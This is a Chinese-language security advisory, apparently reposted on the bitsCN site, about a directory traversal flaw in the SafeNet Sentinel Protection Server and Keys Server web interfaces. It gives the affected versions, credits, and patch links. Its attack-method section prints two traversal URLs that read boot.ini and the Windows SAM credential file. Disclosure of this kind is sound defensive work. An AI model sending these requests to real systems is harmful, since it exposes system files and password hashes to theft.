涉及程序:
Sentinel Protection Server/Keys Server
描述:
Sentinel Protection Server/Keys Server远程目录遍历漏洞
详细:
Sentinel Protection Server和Sentinel Keys Server都是SafeNet公司推出的网络加密解决方案。
网管网bitsCN_com
Sentinel Protection Server和Sentinel Keys Server的Web Server实现上存在输入验证漏洞,远程攻击者可能利用此漏洞执行目录遍历攻击。 网管网bitsCN.com
Sentinel Protection Server和Sentinel Keys Server分别在6002和7002端口上运行Web Server以允许远程监控密钥的使用。这些Web服务软件没有正确地过滤请求路径便在系统调用中使用,因此攻击者可以通过使用../序列请求服务器根目录以外的文件,执行目录遍历攻击。如果远程攻击者提交了特制的HTTP GET请求的话,就可以访问受影响系统上的任意文件。
<*来源:Corey Lebleu
Elliot Kendall (ekendall@brandeis.edu) 网管联盟www.bitsCN.com
链接:http://marc.info/?l=bugtraq&m=119611251729752&w=2
http://marc.info/?l=bugtraq&m=119610275309013&w=2
http://secunia.com/advisories/27811/
*>
中国网管联盟www_bitscn_com
受影响系统:
SafeNet Sentinel Protection Server 7.0.0 - 7.4.0
SafeNet Sentinel Keys Server 1.0.3
不受影响系统:
SafeNet Sentinel Protection Server 7.4.1
SafeNet Sentinel Keys Server 1.0.4
攻击方法:
警 告
中国网管联盟www_bitscn_com
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! 中国网管联盟www_bitscn_com
http://www.example.com:6002/../../../../../../boot.ini
http://www.example.com:7002/../../../../../../winnt/repair/sam
解决方案:
厂商补丁: 网管网bitsCN.com
SafeNet
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip
http://safenet-inc.com/support/files/SPI740SecurityPatch.zip 中国网管论坛bbs.bitsCN.com
